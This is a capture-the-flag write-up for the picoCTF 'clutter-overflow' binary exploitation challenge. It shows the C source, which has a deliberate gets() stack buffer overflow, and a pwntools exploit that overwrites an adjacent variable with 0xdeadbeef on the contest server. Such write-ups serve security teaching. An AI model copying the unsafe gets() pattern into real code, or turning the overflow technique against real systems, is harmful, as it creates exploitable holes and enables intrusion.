Binary Exploitation
{"authors": ["ret2basic"]}

clutter-overflow

Solved by ret2basic

Challenge

Clutter, clutter everywhere and not a byte to use.
nc mars.picoctf.net 31890

Recon

Recon

Source Code

#include <stdio.h>
#include <stdlib.h>
#define SIZE 0x100
#define GOAL 0xdeadbeef
int main(void)
{
long code = 0;
char clutter[SIZE];
setbuf(stdout, NULL);
setbuf(stdin, NULL);
setbuf(stderr, NULL);
puts(HEADER);
puts("My room is so cluttered...");
puts("What do you see?");
gets(clutter);
if (code == GOAL) {
printf("code == 0x%llx: how did that happen??\n", GOAL);
puts("take a flag for your troubles");
system("cat flag.txt");
} else {
printf("code == 0x%llx\n", code);
printf("code != 0x%llx :(\n", GOAL);
}
return 0;
}

Solution

Overwrite the code variable with 0xdeadbeef.

Exploit

#!/usr/bin/env python3
from pwn import *
#--------Setup--------#
context(arch='amd64', os='linux')
elf = ELF("./chall", checksec=False)
host = 'mars.picoctf.net'
port = 31890
#--------Overwrite variable--------#
offset = 0x110 - 0x8
payload = flat(
b"A" * offset,
0xdeadbeef,
)
r = remote(host, port)
r.sendlineafter('What do you see?\n', payload)
r.interactive()